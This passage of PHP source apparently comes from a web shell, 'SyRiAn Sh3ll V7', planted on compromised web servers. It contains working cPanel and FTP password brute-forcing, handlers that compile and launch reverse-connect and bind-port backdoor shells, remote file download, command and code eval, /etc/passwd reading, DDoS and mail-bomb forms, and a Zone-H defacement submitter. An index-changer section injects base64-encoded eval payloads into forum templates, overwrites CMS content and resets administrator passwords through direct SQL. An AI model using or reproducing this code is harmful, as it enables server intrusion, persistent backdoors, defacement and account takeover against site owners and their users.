2021 $ch = curl_init();
2022 curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
2023 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2024 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
2025 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
2026 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
2027 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
2028 $data = curl_exec($ch);
2029 if ( curl_errno($ch) == 28 )
2030 {
2031 print "[-] Connection Timeout Please Check The Target Hostname .";
2032 exit;
2033 }
2034 elseif ( curl_errno($ch) == 0 )
2035 {
2036 print "[+] Cracking Success With Username ($user) and Password ($pass)";
2037 }
2038 curl_close($ch);
2039 }
2040 if(isset($submit) && !empty($submit))
2041 {
2042 if(empty($users) && empty($pass))
2043 {
2044 print "[-] Please Check The Users or Password List Entry . . .";
2045 }
2046 if(empty($users))
2047 {
2048 print "[-] Please Check The Users List Entry . . .";
2049 }
2050 if(empty($pass))
2051 {
2052 print "[-] Please Check The Password List Entry . . ";
2053 }
2054 $userlist=explode("\n",$users);
2055 $passlist=explode("\n",$pass);
2056 print "[~]# Cracking Process Started, Please Wait ...";
2057 foreach ($userlist as $user)
2058 {
2059 $pureuser = trim($user);
2060 foreach ($passlist as $password )
2061 {
2062 $purepass = trim($password);
2063 if($cracktype == "ftp")
2064 {
2065 ftp_check($target,$pureuser,$purepass,$connect_timeout);
2066 }
2067 if ($cracktype == "cpanel")
2068 {
2069 cpanel_check($target,$pureuser,$purepass,$connect_timeout);
2070 }
2071 }
2072 }
2073 }
2074 }
2075 # --------------------------
2076 # Back Connection
2077 #---------------------------
2078 else if($_POST['backconn'])
2079 {
2080 if (!empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C'))
2081 {
2082 $ip = trim($_POST['ip']);
2083 $port = trim($_POST['backport']);
2084 tulis("bcc.c",$back_connect_c);
2085 Exe('gcc -o bcc bcc.c');
2086 Exe('chmod 777 bcc');
2087 @unlink('bcc.c');
2088 Exe("./bcc ".$ip." ".$port." &");
2089 $msg = "Now script try connect to ".$ip." port ".$port." ...";
2090 }
2091 elseif (!empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl'))
2092 {
2093 $ip = trim($_POST['ip']);
2094 $port = trim($_POST['backport']);
2095 tulis("bcp",$back_connect);
2096 Exe("chmod +x bcp");
2097 $p2=which("perl");
2098 Exe($p2." bcp ".$ip." ".$port." &");
2099 $msg = "Now script try connect to ".$ip." port ".$port." ...";
2100 }
2101 }
2102 # --------------------------
2103 # Bind Connection
2104 #---------------------------
2105 else if($_POST['bind'])
2106 {
2107 if (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C'))
2108 {
2109 $port = trim($_POST['port']);
2110 $passwrd = trim($_POST['bind_pass']);
2111 tulis("bdc.c",$port_bind_bd_c);
2112 Exe('gcc -o bdc bdc.c');
2113 Exe('chmod 777 bdc');
2114 @unlink("bdc.c");
2115 Exe("./bdc ".$port." ".$passwrd." &");
2116 $scan = Exe("ps aux");
2117 if(eregi("./bdc $por",$scan))
2118 {
2119 $msg = "Process found running, backdoor setup successfully.";
2120 }
2121 else
2122 {
2123 $msg = "Process not found running, backdoor not setup successfully.";
2124 }
2125 }
2126
2127 elseif (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl'))
2128 {
2129 $port = trim($_POST['port']);
2130 $passwrd = trim($_POST['bind_pass']);
2131 tulis("bdp",$port_bind_bd_pl);
2132 Exe("chmod 777 bdp");
2133 $p2=which("perl");
2134 Exe($p2." bdp ".$port." &");
2135 $scan = Exe("ps aux");
2136 if(eregi("$p2 bdp $port",$scan))
2137 {
2138 $msg = "Process found running, backdoor setup successfully.";
2139 }
2140 else
2141 {
2142 $msg = "Process not found running, backdoor not setup successfully.";
2143 }
2144 }
2145 }
2146
2147
2148 echo "</textarea>";
2149 if($_POST['editFileSubmit'])
2150 {
2151 echo "<input type='hidden' value='".$_POST['editFile']."' name='file2edit' /> ";
2152 echo "<input type='submit' value='Save' name='saveEditedFile'>";
2153 }
2154 echo "</form>
2155
2156 <!-- Main Table -->
2157 <table width='100%'><tr>
2158 <td width='30%' height=30>
2159 <!-- End Of Main Table -->
2160 <!-- Commands Alias-->
2161 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2162 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2163 <td style='background-color:#666;padding-left:10px;'>Commands Alias </td></tr><tr><td height='45' colspan='2'>";SelectCommand($os); echo "<input
2164
2165name='submitCommands' type='submit' value='ExecuteCommand'></td></tr></table></form>
2166 <!-- End Of Commands Alias-->
2167 </td>
2168 <td width='30%' height=30>
2169 <!-- Command Line -->
2170 <form method='POST'>
2171 <table width='100%' height='72' border='0' id='Box'><tr>
2172 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2173 <td style='background-color:#666;padding-left:10px;'>Command Line </td></tr><tr><td height='45' colspan='2'>
2174 <input type='text' name='cmd' id='commandLine' value='dir' size=59>
2175 <input type='text' name='directory' value=".getcwd()." size=59>
2176 <input name='Execute' id='Execute' type='submit' value='Execute' >
2177 </td></tr></table></form>
2178 <!-- End Of Command Line -->
2179 </td>
2180 <td width='30%' height=30>
2181 <!-- Edit File -->
2182 <form method=POST>
2183 <table width='100%' height='72' border='0' id='Box'><tr>
2184 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2185 <td style='background-color:#666;padding-left:10px;'>Edit File </td></tr><tr><td height='45' colspan='2'>
2186 <input type='text' name='editFile' size=59>
2187 <input name='editFileSubmit' type='submit' value='Edit'>
2188 </td></tr></table></form>
2189 <!-- End Of Edit File -->
2190 </td>
2191 </tr>
2192 <tr>
2193 <td width='30%'>
2194 <!-- Chmod Force -->
2195 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2196 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2197 <td style='background-color:#666;padding-left:10px;'>Change Mode </td></tr><tr><td height='45' colspan='2'>
2198 <input type='text' name='fileName' value='index.php' size=48>
2199 <br/><input type='text' name='per' value='0644' size='10'>
2200 <input type=submit value='Change Now !' name='changePermission'>
2201 </td></tr></table></form>
2202 <!-- End Of Chmod Force -->
2203 </td>
2204 <td>
2205 <!-- Get File -->
2206 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2207 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2208 <td style='background-color:#666;padding-left:10px;'>Get File </td></tr><tr><td height='45' colspan='2'>
2209 <input type='text' name='fileUrl' size='59' value='http://www.'>
2210 <select name=getType>
2211 <option value=wget>wget</option>
2212 <option value='curl -o'>curl -o</option>
2213 <option value=get>get</option>
2214 <option value='lynx -source'>lynx -source</option>
2215 </select>
2216 <input name=getFile type=submit value='Get File' >
2217 </td></tr></table></form>
2218 <!-- End Of Get File -->
2219 </td>
2220 <td>
2221 <!-- Bind Connection -->
2222 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2223 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2224 <td style='background-color:#666;padding-left:10px;'>Bind Connection </td></tr><tr><td height='45' colspan='2'>
2225 <input class='inputz' type='text' name='bind_pass' size='26' value='".gethostbyname($_SERVER["HTTP_HOST"])."'>
2226 <input type='text' name='port' size='26' value='443'>
2227 <select class='inputz' size='1' name='use'>
2228 <option value='Perl'>Perl</option><option value='C'>C</option>
2229 </select>
2230 <input class='inputzbut' type='submit' name='bind' value='Bind' style='width:120px'>
2231 </td></tr></table></form>
2232 <!-- End Of Bind Connection -->
2233 </td>
2234 </tr>
2235 <tr>
2236 <td>
2237 <!-- CGI perl -->
2238 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2239 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2240 <td style='background-color:#666;padding-left:10px;'>CGI Perl </td></tr><tr><td height='45' colspan='2'>
2241 <input type='text' value='".getcwd()."' name='cgiperlPath' size='43'>
2242 <input type='submit' name='generatePel' value='Generate'></td></tr></table></form>
2243 <!-- End Of CGI perl -->
2244 </td><td>
2245 <!-- Forbidden -->
2246 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2247 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2248 <td style='background-color:#666;padding-left:10px;'>Forbidden </td></tr><tr><td height='45' colspan='2'>
2249 <input type='text' value='".getcwd()."' name='forbiddenPath' size='70%'/>
2250 <select name='403'>
2251 <option value='DirectoryIndex'>DirectoryIndex</option>
2252 <option value='HeaderName'>HeaderName</option>
2253 <option value='TXT'>TXT</option>
2254 <option value='404'>404</option>
2255 <option value='ReadmeName'>ReadmeName</option>
2256 <option value='footerName'>footerName</option>
2257 </select>
2258 <input type='submit' value='Generate' name='generateForbidden'>
2259 </td></tr></table></form>
2260 <!-- End Of Forbidden -->
2261 </td>
2262 <td>
2263 <!-- Back Connection -->
2264 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2265 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2266 <td style='background-color:#666;padding-left:10px;'>Back Connection </td></tr><tr><td height='45' colspan='2'>
2267 <input type='text' name='ip' size='26' value='".GetRealIP()."'>
2268 <input type='text' name='backport' size='26' value='443'>
2269 <select name='use'>
2270 <option value='Perl'>Perl</option>
2271 <option value='C'>C</option>
2272 </select>
2273 <input type='submit' name='backconn' value='Connect'>
2274 </td></tr></table></form>
2275 <!-- End Of Back Connection -->
2276 </td>
2277 </tr>
2278 <tr>
2279 <td>
2280 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2281 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2282 <td style='background-color:#666;padding-left:10px;'>Hash Analyzer </td></tr><tr><td height='45' colspan='2'>
2283 <input type='text' name='hashToAnalyze' size=60>
2284 <input type='submit' value='Analyze Now' name='analyzieNow'></td></tr></table></form>
2285 </td>
2286 <td>
2287 <!-- Eval Code -->
2288 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2289 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2290 <td style='background-color:#666;padding-left:10px;'>Eval Code </td></tr><tr><td height='45' colspan='2'>
2291 <input type='text' name='php_eval' size='70' value='echo \"SyRiAn Sh3ll V7\";'>
2292 <input type=submit name=submitEval value=Eval></td></tr></table></form>
2293 <!-- End Of Eval Code -->
2294 </td>
2295 <td>
2296 <!-- Users & Domains -->
2297 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2298 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2299 <td style='background-color:#666;padding-left:10px;'>Users & Domains </td></tr><tr><td height='45' colspan='2'>
2300 <input type='text' name='usersPath' value='".getcwd()."' size='55'/>
2301 <input type='submit' name='GenerateUsers' Value='Generate'>
2302 <!-- End Of Users & Domains -->
2303 </td></tr></table></form>
2304 </td>
2305 </tr>
2306 <tr>
2307 <td>
2308 <!-- Reading Files -->
2309 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2310 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2311 <td style='background-color:#666;padding-left:10px;'>Reading Files & Dir Using PHP Bugs </td></tr><tr><td height='45' colspan='2'>
2312 <input type='text' value='/etc/passwd' name='file' size=35>
2313 <input class='buttons' type='submit' name='read' value='Read File'>
2314 <input class='buttons' type='submit' name='show' value='Show directory'>
2315 </td></tr></table></form>
2316 <!-- End Of Reading Files -->
2317 </td>
2318 <td>
2319 <!--Encryption -->
2320 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2321 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2322 <td style='background-color:#666;padding-left:10px;'>Encryption </td></tr><tr><td height='45' colspan='2'>
2323 <input type='text' value='SyRiAn_Sh3ll' name='ENCRYPTION' size='80%'>
2324 <input type='submit' value='Encrypt' name='encryptNow'>
2325 </td></tr></table></form>
2326 <!-- End Of Encryption -->
2327 </td>
2328 <td>
2329 <!-- Metasploit RC -->
2330 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2331 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2332 <td style='background-color:#666;padding-left:10px;'>Metasploit Connection </td></tr><tr><td height='45' colspan='2'>
2333 <input type='text' size='15' name='ip' value='127.0.0.1'>
2334 <input type='text' size='5' name='port' value='443'>
2335 <input type='submit' value='Connect' name='metaConnect'>
2336 </td></tr></table></form>
2337 <!-- End Of Metasploit RC -->
2338 </td>
2339 </tr>
2340 <tr>
2341 <td>
2342 <!-- DDOS Attacker -->
2343 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2344 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2345 <td style='background-color:#666;padding-left:10px;'>DDOS Attacker </td></tr><tr><td height='45' colspan='2'>
2346 <input type='text' name='ipToAttack' size='40' value='Target IP'>
2347 <input type='text' name='portToAttack' size='20' value='Target PORT'>
2348 <input type='submit' name='StartAttack' value='Attack'>
2349 </td></tr></table></form>
2350 <!-- End Of DDOS Attacker -->
2351 </td>
2352 <td>
2353 <!-- Ports Scanner -->
2354 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2355 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2356 <td style='background-color:#666;padding-left:10px;'>Ports Scanner </td></tr><tr><td height='45' colspan='2'>
2357 <input type='text' name='domainToScanPort' size='50' value='172.0.0.1'> <input type='submit' name='submitDomainToScanPort' Value='Scan Now'>
2358 </td></tr></table></form>
2359 <!-- End Of Ports Scanner -->
2360 </td>
2361 <td>
2362 <!-- ACP Finder -->
2363 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2364 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2365 <td style='background-color:#666;padding-left:10px;'>ACP Finder </td></tr><tr><td height='45' colspan='2'>
2366 <input name='hash_lol' class='textbox' type='text' size='30' value='http://www.example.com/'/>
2367 <input type='text' value='.php' name='extention'/>
2368 <input name='submit_lol' class='textbox' value='Brute Force Now' type='submit'>
2369 <!-- End Of ACP Finder -->
2370 </td></tr></table></form>
2371 </td>
2372 </tr>
2373
2374 <tr>
2375 <br>
2376 <td valign='top'>
2377 <!-- Server ShortCut -->
2378 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2379 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2380 <td style='background-color:#666;padding-left:10px;'>Server ShortCut </td></tr><tr><td height='45' colspan='2'>
2381 <input type='text' value='".getcwd()."' size='68' name='ShourtCutPath'>
2382 <input type='submit' name='generateSER' value=' Generate '>
2383 </td></tr></table></form>
2384 <!-- End Of Server ShoutCut -->
2385 </td>
2386 <td valign='top'>
2387 <!-- Fast Tools -->
2388 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2389 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2390 <td style='background-color:#666;padding-left:10px;'>Fast Tools </td></tr><tr><td height='45' colspan='2'>
2391 <input type=submit value='Generate .HTAccess' name='htaccessGenerate'>
2392 <input type=submit value='Generate php.ini' name='phpiniGenerate'>
2393 <input type=submit value='Generate ini.php' name='iniphpGenerate'><br/><br/>
2394 <input type='submit' value='Finding Config Files' name='configFinderSubmit' />
2395 <input type='submit' name='showUsers' value='Show Users' />
2396 </td></tr></table></form>
2397 <!-- End Of Fast Tools -->
2398 </td>
2399 <td valign='TOP'>
2400 <!-- SQL Reader -->
2401 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2402 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2403 <td style='background-color:#666;padding-left:10px;'>SQL Reader</td></tr><tr><td height='45' colspan='2'>
2404 <input type='text' value='/etc/passwd' name='file' size='35'><br/>
2405 <input type='text' name='host' value='127.0.0.1'>
2406 <input type='text' name='user' value='DB user'>
2407 <input type='text' name='pass' value='DB pass'>
2408 <input type=text name='db' value='DB name'>
2409 <input type='submit' name='sql2Read' value='Read'>
2410 ";
2411 if($sql_con)
2412 {
2413 echo '<input style="width:300px;" type="text" name="filetoread">
2414 <input type="submit" value="Read" name="SQLToRead">';
2415 }
2416 echo "</td></tr></table></form>
2417 <!-- End Of SQL Reader -->
2418 </td>
2419 </tr>
2420 <tr>
2421 <td valign='top'>
2422 <!-- Mail Storm -->
2423 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2424 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2425 <td style='background-color:#666;padding-left:10px;'>Mail Storm </td></tr><tr><td height='45' colspan='2'>
2426 <textarea rows='5' cols='45' name='Comments' >Attacker Message</textarea>
2427 <input type='text' name='to' value='Target Email' >
2428 <input type='text' size='5' name='nom' value='100'>
2429 <input name='sendMailStorm' type='submit' value='Send Mail Storm ' >
2430 </td></tr></table></form>
2431 <!-- End Of Mail Storm -->
2432 </td>
2433 <td valign='top'>
2434 <!-- SQL Query -->
2435 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2436 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2437 <td style='background-color:#666;padding-left:10px;'>SQL Query</td></tr><tr><td height='45' colspan='2'>
2438 <input type = 'text' name=\"QU_HOST\" value='127.0.0.1'>
2439 <input type = 'text' name=\"QU_USER\" value='DB User'><br/>
2440 <input type = 'text' name=\"QU_PASS\" value='DB Pass'>
2441 <input type=text name=\"QU_DB\" value='DB Name' >
2442 <textarea name='QU' rows=2 cols=50>SELECT * FROM emp ;</textarea>
2443 <input name='MySQLQuery' type='submit'>
2444 </td></tr></table></form>
2445 <!-- SQL Query -->
2446 </td>
2447 <td valign='top'>
2448 <!-- Email Extractor -->
2449 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2450 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2451 <td style='background-color:#666;padding-left:10px;'>Email Extractor</td></tr><tr><td height='45' colspan='2'>
2452 <input type = 'text' name='EM_HOST' value='127.0.0.1'>
2453 <input type='text' name='EM_USER' value='DB user'>
2454 <input type ='text' name='EM_PASS' value='DB pass'>
2455 <input type='text' name='EM_DB' value='DB name'>
2456 <input type ='text' name='EM_TABLE' value='users Table'>
2457 <input type ='text' name='EM_COLUMN' value='emails Column'><br/>
2458 <input name='getEmails' type='submit' id='submit' style='font-weight: value=Extract now !'>
2459 <input type='submit' value='?' name='emailExtractorHelp' alt='Email Extractor Help'/>
2460 </td></tr></table></form>
2461 <!-- End Of Email Extractor -->
2462 </td>
2463 </tr>
2464 <tr>
2465 <td valign='top'>
2466 <!-- Zone-H -->
2467 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2468 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2469 <td style='background-color:#666;padding-left:10px;'>Zone-H Defacer</td></tr><tr><td height='45' colspan='2'>";
2470 echo '<form action="" method="post">
2471<input type="text" name="defacer" size="40" value="Attacker" />
2472<select name="hackmode">
2473<option >--------SELECT--------</option>
2474<option value="1">known vulnerability (i.e. unpatched system)</option>
2475<option value="2" >undisclosed (new) vulnerability</option>
2476<option value="3" >configuration / admin. mistake</option>
2477<option value="4" >brute force attack</option>
2478<option value="5" >social engineering</option>
2479<option value="6" >Web Server intrusion</option>
2480<option value="7" >Web Server external module intrusion</option>
2481<option value="8" >Mail Server intrusion</option>
2482<option value="9" >FTP Server intrusion</option>
2483<option value="10" >SSH Server intrusion</option>
2484<option value="11" >Telnet Server intrusion</option>
2485<option value="12" >RPC Server intrusion</option>
2486<option value="13" >Shares misconfiguration</option>
2487<option value="14" >Other Server intrusion</option>
2488<option value="15" >SQL Injection</option>
2489<option value="16" >URL Poisoning</option>
2490<option value="17" >File Inclusion</option>
2491<option value="18" >Other Web Application bug</option>
2492<option value="19" >Remote administrative panel access bruteforcing</option>
2493<option value="20" >Remote administrative panel access password guessing</option>
2494<option value="21" >Remote administrative panel access social engineering</option>
2495<option value="22" >Attack against administrator(password stealing/sniffing)</option>
2496<option value="23" >Access credentials through Man In the Middle attack</option>
2497<option value="24" >Remote service password guessing</option>
2498<option value="25" >Remote service password bruteforce</option>
2499<option value="26" >Rerouting after attacking the Firewall</option>
2500<option value="27" >Rerouting after attacking the Router</option>
2501<option value="28" >DNS attack through social engineering</option>
2502<option value="29" >DNS attack through cache poisoning</option>
2503<option value="30" >Not available</option>
2504</select>
2505
2506<select name="reason">
2507<option >--------SELECT--------</option>
2508<option value="1" >Heh...just for fun!</option>
2509<option value="2" >Revenge against that website</option>
2510<option value="3" >Political reasons</option>
2511<option value="4" >As a challenge</option>
2512<option value="5" >I just want to be the best defacer</option>
2513<option value="6" >Patriotism</option>
2514<option value="7" >Not available</option>
2515</select>
2516<textarea name="domain" cols="44" rows="9">List Of Domains</textarea>
2517<input type="submit" value="Send Now !" name="SendNowToZoneH" />
2518</form>';
2519 echo "</td></tr></table></form>
2520 <!-- End Of Zone-H -->
2521 </td>
2522 <td valign='top'>
2523 <!-- Cpanel And FTP BruteForce Attacker -->
2524 <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
2525 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2526 <td style='background-color:#666;padding-left:10px;'>Cpanel And FTP BruteForce </td></tr><tr><td height='45' colspan='2'>
2527 <textarea rows='12' name='users' cols='23' >";
2528 @system('ls /var/mail');
2529 echo "</textarea>
2530 <textarea rows='12' name='passwords' cols='23' >123123\n123456\n1234567\n12345678\n123456789\n159159\n112233\n332211\n!@#$%^\n^%$#@!.\n!@#$%^&\n!@#$%^&*\n!@#$
2531
2532%^&*(\npassword\npasswd\npasswords\npass\np@assw0rd\npass@word1
2533 </textarea>
2534 <input type='text' name='target' size='16' value='127.0.0.1' >
2535 <input name='cracktype' value='cpanel' checked type='radio'><sy>Cpanel (2082)</sy>
2536 <input name='cracktype' value='ftp' type='radio'><sy>Ftp (21)</sy>
2537 <input type='submit' value=' Crack it ! ' name='BruteForceCpanelAndFTP' >
2538 </td></tr></table></form>
2539 <!-- End Of Cpanel And FTP BruteForce Attacker -->
2540 </td>
2541 <td valign='top'>
2542 <!-- Upload Files -->
2543 <form enctype=\"multipart/form-data\" method=\"POST\"><table width='100%' height='72' border='0' id='Box'><tr>
2544 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2545 <td style='background-color:#666;padding-left:10px;'>Upload Files </td></tr><tr><td height='45' colspan='2'>
2546 <input type=\"file\" name=\"uploadfile[]\">
2547 <input type=\"file\" name=\"uploadfile[]\">
2548 <input type=\"file\" name=\"uploadfile[]\">
2549 <input type=\"file\" name=\"uploadfile[]\">
2550 <input type=\"file\" name=\"uploadfile[]\">
2551 <input type=\"file\" name=\"uploadfile[]\">
2552 <input type=\"file\" name=\"uploadfile[]\">
2553 <input type=\"file\" name=\"uploadfile[]\">
2554 <input type=\"file\" name=\"uploadfile[]\">
2555 <input type=\"file\" name=\"uploadfile[]\">
2556 <input type=\"submit\" value=\"Upload Files\" name='UploadNow'>
2557 </td></tr></table></form>
2558 <!-- End Of Upload Files -->
2559 </td></tr>
2560 </table>
2561 ";
2562 if($_POST['changeDirectory'])
2563 {
2564 $directory = $_POST['directory'];
2565 $directory = @str_replace("\\\\"," ",$directory);
2566 $directory = @str_replace(" ","\\",$directory);
2567 @chdir($directory);
2568 }
2569 if($_POST['getFile'])
2570 {
2571 $fileUrl = $_POST['fileUrl'];
2572 $getType = $_POST['getType'];
2573 Exe("'".$getType.$fileUrl."'");
2574 }
2575footer();
2576}
2577# ---------------------------------------#
2578# IndexChanger #
2579#----------------------------------------#
2580if ($_GET['id']== 'scriptsHack' )
2581{
2582 echo "
2583 <table width='100%'>
2584 <tr>
2585 <td colspan='2'><textarea cols='153' rows='10'>";
2586 if($_POST['UpdateIndex'] || $_POST['changeInfo'] )
2587 {
2588 $host = $_POST['HOST'];
2589 $user = $_POST['USER'];
2590 $pass = $_POST['PASS'];
2591 $db = $_POST['DB'];
2592 $index = $_POST['INDEX'];
2593 $prefix = $_POST['PREFIX'];
2594 if (empty($_POST['HOST']))
2595 $host = '127.0.0.1';
2596 $index=str_replace("\'","'",$index);
2597 @mysql_connect($host,$user,$pass) or die( "[-] Unable TO Connect DATABASE ! Username Or Password Is Wrong !!");
2598 @mysql_select_db($db) or die ("[-] Database Name Is Wrong !!");
2599
2600 if($_POST['UpdateIndex'])
2601 {
2602 if ($_POST['ScriptType'] == 'vb')
2603 {
2604 $full_index = "{\${eval(base64_decode(\'";
2605 $full_index .= base64_encode("echo \"$index\";");
2606 $full_index .= "\'))}}{\${exit()}}</textarea>";
2607 if($_POST['injectFAQ'])
2608 {
2609 $injectfaq = @mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='faq'");
2610 }
2611 else
2612 {
2613 $ok1 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='forumhome'");
2614 if (!$ok1)
2615 {
2616 $ok2 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='header'");
2617 }
2618 elseif (!$ok2)
2619 {
2620 $ok3 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='spacer_open'");
2621 }
2622 elseif(!$ok3)
2623 {
2624 $ok4 = @mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='faq'");
2625 }
2626 }
2627 mysql_close();
2628 if ($ok1 || $ok2 || $ok3 || $ok4 || $injectfaq )
2629 {
2630 update();
2631 }
2632 else
2633 {
2634 echo "Updating Has Failed !";
2635 }
2636 }
2637 else if ($_POST['ScriptType'] == 'wp')
2638 {
2639 $tableName = $prefix."posts" ;
2640 $ok1 = mysql_query("UPDATE $tableName SET post_title ='".$index."' WHERE ID > 0 ");
2641 if(!$ok1)
2642 {
2643 $ok2 = mysql_query("UPDATE $tableName SET post_content ='".$index."' WHERE ID > 0 ");
2644 }
2645 elseif(!$ok2)
2646 {
2647 $ok3 = mysql_query("UPDATE $tableName SET post_name ='".$index."' WHERE ID > 0 ");
2648 }
2649 mysql_close();
2650 if ($ok1 || $ok2 || $ok3)
2651 {
2652 update();
2653 }
2654 else
2655 {
2656 echo "Updating Has Failed !";
2657 }
2658 }
2659 else if ($_POST['ScriptType'] == 'jos')
2660 {
2661 $jos_table_name = $prefix."menu" ;
2662 $jos_table_name2 = $prefix."modules" ;
2663 $ok1 = mysql_query("UPDATE $jos_table_name SET name ='".$index."' WHERE ID > 0 ");
2664 if(!$ok1)
2665 {
2666 $ok2 = mysql_query("UPDATE $jos_table_name2 SET title ='".$index."' WHERE ID > 0 ");
2667 }
2668 mysql_close();
2669 if ($ok1 || $ok2 || $ok3)
2670 {
2671 update();
2672 }
2673 else
2674 {
2675 echo "Updating Has Failed !";
2676 }
2677 }
2678 else if ($_POST['ScriptType'] == 'phpbb')
2679 {
2680 $php_table_name = $prefix."forums";
2681 $php_table_name2 = $prefix."posts";
2682 $ok1 = mysql_query("UPDATE $php_table_name SET forum_name ='.$index.' WHERE forum_id > 0 ");
2683 if(!$ok1)
2684 {
2685 $ok2 = mysql_query("UPDATE $php_table_name2 SET post_subject ='.$index.' WHERE post_id > 0 ");
2686 }
2687 mysql_close();
2688 if ($ok1 || $ok2 || $ok3)
2689 {
2690 update();
2691 }
2692 else
2693 {
2694 echo "Updating Has Failed !";
2695 }
2696 }
2697 else if ($_POST['ScriptType'] == 'ipb')
2698 {
2699 $ip_table_name = $prefix."components" ;
2700 $ip_table_name2 = $prefix."forums" ;
2701 $ip_table_name3 = $prefix."posts" ;
2702 $ok1 = mysql_query("UPDATE $ip_table_name SET com_title ='".$index."' WHERE com_id > 0");
2703 if(!$ok1)
2704 {
2705 $ok2 = mysql_query("UPDATE $ip_table_name2 SET name ='".$index."' WHERE id > 0");
2706 }
2707 if(!$ok2)
2708 {
2709 $ok3 = mysql_query("UPDATE $ip_table_name3 SET post ='".$IP_INDEX."' WHERE pid <10") or die("Can't Update Templates
2710
2711!!");
2712 }
2713 mysql_close();
2714 if ($ok1 || $ok2 || $ok3)
2715 {
2716 update();
2717 }
2718 else
2719 {
2720 echo "Updating Has Failed !";
2721 }
2722 }
2723 else if ($_POST['ScriptType'] == 'smf')
2724 {
2725 $table_name = $prefix."boards" ;
2726 {
2727 $ok1 = mysql_query("UPDATE $table_name SET description ='.$index.' WHERE ID_BOARD > 0");
2728 }
2729 if(!$ok1)
2730 {
2731 $ok2 = mysql_query("UPDATE $table_name SET name ='.$index.' WHERE ID_BOARD > 0");
2732 }
2733 mysql_close();
2734 if ($ok1 || $ok2)
2735 {
2736 update();
2737 }
2738 else
2739 {
2740 echo "Updating Has Failed !";
2741 }
2742 }
2743 else if ($_POST['ScriptType'] == 'mybb')
2744 {
2745 $mybb_prefix = $prefix."templates";
2746 $ok1 = mysql_query(" update $mybb_prefix set template='".$index."' where title='index' ");
2747 if ($ok1)
2748 {
2749 update();
2750 }
2751 else
2752 {
2753 echo "Updating Has Failed !";
2754 }
2755 mysql_close();
2756 }
2757 }
2758 elseif($_POST['changeInfo'])
2759 {
2760 $adminID = $_POST['adminID'];
2761 $userName = $_POST['userName'];
2762 $password = $_POST['password'];
2763 if($_POST['ScriptType'] == 'vb')
2764 {
2765 //VB Code
2766 $password = md5($password);
2767 $tryChaningInfo = @mysql_query("UPDATE user SET username = '".$userName."' , password = '".$password."' WHERE userid = ".
2768
2769$adminID."");
2770 if($tryChaningInfo)
2771 {update();}
2772 else {mysql_error();}
2773 }
2774 else if($_POST['ScriptType'] == 'wp')
2775 {
2776 //WoredPress
2777 $password = crypt($password);
2778 $tryChaningInfo = @mysql_query("UPDATE wp_users SET user_login = '".$userName."' , user_pass = '".$password."' WHERE ID
2779
2780= ".$adminID."");
2781 if($tryChaningInfo)
2782 {update();}
2783 else {mysql_error();}
2784 }
2785 else if($_POST['ScriptType'] == 'jos')
2786 {
2787 //Joomla
